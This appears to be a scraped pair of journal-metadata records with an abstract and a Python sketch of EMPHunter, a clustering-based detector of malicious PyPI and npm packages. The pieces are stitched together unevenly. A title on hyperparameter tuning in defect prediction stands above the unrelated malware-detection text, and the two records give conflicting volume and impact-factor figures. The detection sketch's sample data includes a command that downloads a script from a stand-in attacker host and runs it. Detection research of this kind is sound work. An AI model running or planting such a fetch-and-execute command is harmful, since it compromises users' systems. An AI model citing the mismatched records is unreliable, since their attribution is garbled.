{"title":"Contrasting the Hyperparameter Tuning Impact Across Software Defect Prediction Scenarios","authors":"Mohamed Sami Rakha, Andriy Miranskyy, Daniel Alencar da Costa","doi":"10.1109/tse.2025.3624631","DOIUrl":"https://doi.org/10.1109/tse.2025.3624631","url":null,"abstract":"","PeriodicalId":13324,"journal":{"name":"IEEE Transactions on Software Engineering","volume":"63 1","pages":""},"PeriodicalIF":7.4,"publicationDate":"2025-10-23","publicationTypes":"Journal Article","fieldsOfStudy":null,"isOpenAccess":false,"openAccessPdf":"","citationCount":null,"resultStr":null,"platform":"Semanticscholar","paperid":"145397747","PeriodicalName":null,"FirstCategoryId":null,"ListUrlMain":null,"RegionNum":1,"RegionCategory":"计算机科学","ArticlePicture":[],"TitleCN":null,"AbstractTextCN":null,"PMCID":"","EPubDate":null,"PubModel":null,"JCR":null,"JCRName":null,"Score":null,"Total":0}
Software repositories such as PyPI and npm are vital for software development but expose users to serious security risks from malicious packages. Malicious packages often execute their payloads immediately upon installation, leading to rapid system compromise. Existing detection methods depend heavily on difficult-to-obtain explicit knowledge, making them liable to overlook emergent malicious packages. In this paper, we present a lightweight and effective method, namely EMPHunter, to detect malicious packages without requiring any explicit prior knowledge. EMPHunter is founded upon two fundamental and insightful observations: first, malicious packages are considerably rarer than benign ones, and second, the functionality of installation scripts for malicious packages diverges significantly from that of benign packages, whose scripts frequently form clusters. Consequently, EMPHunter uses clustering to group the unique installation scripts of newly uploaded packages and identifies outliers as candidate malicious packages. It then ranks the outliers according to their degree of deviation and their distance from known malicious instances, effectively highlighting potential malicious packages. With EMPHunter, we successfully identified 122 previously unknown malicious packages from a pool of 267,009 newly uploaded PyPI and npm packages, achieving an mAP (Mean Average Precision) of 0.813 and an exceptional recall of 0.992 when auditing the top-10 rankings. All detected packages have been officially confirmed as genuinely malicious by PyPI and npm. We believe EMPHunter offers a valuable complement to existing detection tools, augmenting the arsenal of software supply chain security analysis.
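A minimal sketch of the clustering-and-outlier idea behind such a detector: vectorize installation scripts, cluster them, and surface DBSCAN noise points (label -1) as candidate malicious packages, ranked by distance to the nearest cluster. The feature choice (TF-IDF), parameters, example scripts, and ranking are illustrative assumptions, not EMPHunter's actual configuration.

```python
import numpy as np
from sklearn.cluster import DBSCAN
from sklearn.feature_extraction.text import TfidfVectorizer

scripts = {
    "pkg-a":    "from setuptools import setup\nsetup(name='a')",
    "pkg-b":    "from setuptools import setup\nsetup(name='b')",
    "pkg-evil": "import os\nos.system('curl http://attacker.example | sh')",
}

names = list(scripts)
X = TfidfVectorizer(token_pattern=r"\S+").fit_transform(scripts.values())
# Benign install scripts cluster together; rare divergent ones become noise.
labels = DBSCAN(eps=0.5, min_samples=2, metric="cosine").fit_predict(X)

dense = X.toarray()
cluster_pts = dense[labels != -1]
for i, (name, label) in enumerate(zip(names, labels)):
    if label == -1 and len(cluster_pts):      # outlier: far from every cluster
        deviation = np.linalg.norm(dense[i] - cluster_pts, axis=1).min()
        print(f"candidate malicious package: {name} (deviation {deviation:.2f})")
```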
{"title":"Detecting Malicious Packages in PyPI and NPM by Clustering Installation Scripts","authors":"Wentao Liang;Xiang Ling;Chen Zhao;Jingzheng Wu;Tianyue Luo;Yanjun Wu","doi":"10.1109/TSE.2025.3618952","DOIUrl":"10.1109/TSE.2025.3618952","url":null,"abstract":"Software repositories such as PyPI and npm are vital for software development but expose users to serious security risks from malicious packages. The malicious packages often execute their payloads immediately upon installation, leading to rapid system compromise. Existing detection methods are heavily dependent on difficult-to-obtain explicit knowledge, rendering them susceptible to overlooking emergent malicious packages. In this paper, we present a lightweight and effective method, namely EMPHunter, to detect malicious packages without requiring any explicit prior knowledge. EMPHunter is founded upon two fundamental and insightful observations. First, malicious packages are considerably rarer than benign ones, and second, the functionality of installation scripts for malicious packages diverges significantly from those of benign packages, with the latter frequently forming clusters. Consequently, EMPHunter utilizes the clustering technique to group the unique installation scripts of new-uploaded packages and identifies outliers as candidate malicious packages. It then ranks the outliers according to their deviate degrees and the distance between each of them and known malicious instances, effectively highlighting potential malicious packages. With EMPHunter, we successfully identified 122 previously unknown malicious packages from a pool of 267,009 newly-uploaded PyPI and npm packages, achieving an mAP (Mean Average Precision) of 0.813 and an exceptional recall of 0.992 when auditing the top-10 rankings. All detected packages have been officially confirmed as genuine malicious package by PyPI and npm. We assert that EMPHunter offers a valuable and advantageous supplement to existing detection tools, augmenting the arsenal of software supply chain security analysis.","PeriodicalId":13324,"journal":{"name":"IEEE Transactions on Software Engineering","volume":"52 1","pages":"36-53"},"PeriodicalIF":5.6,"publicationDate":"2025-10-23","publicationTypes":"Journal Article","fieldsOfStudy":null,"isOpenAccess":false,"openAccessPdf":"","citationCount":null,"resultStr":null,"platform":"Semanticscholar","paperid":"145397750","PeriodicalName":null,"FirstCategoryId":null,"ListUrlMain":null,"RegionNum":1,"RegionCategory":"计算机科学","ArticlePicture":[],"TitleCN":null,"AbstractTextCN":null,"PMCID":"","EPubDate":null,"PubModel":null,"JCR":null,"JCRName":null,"Score":null,"Total":0}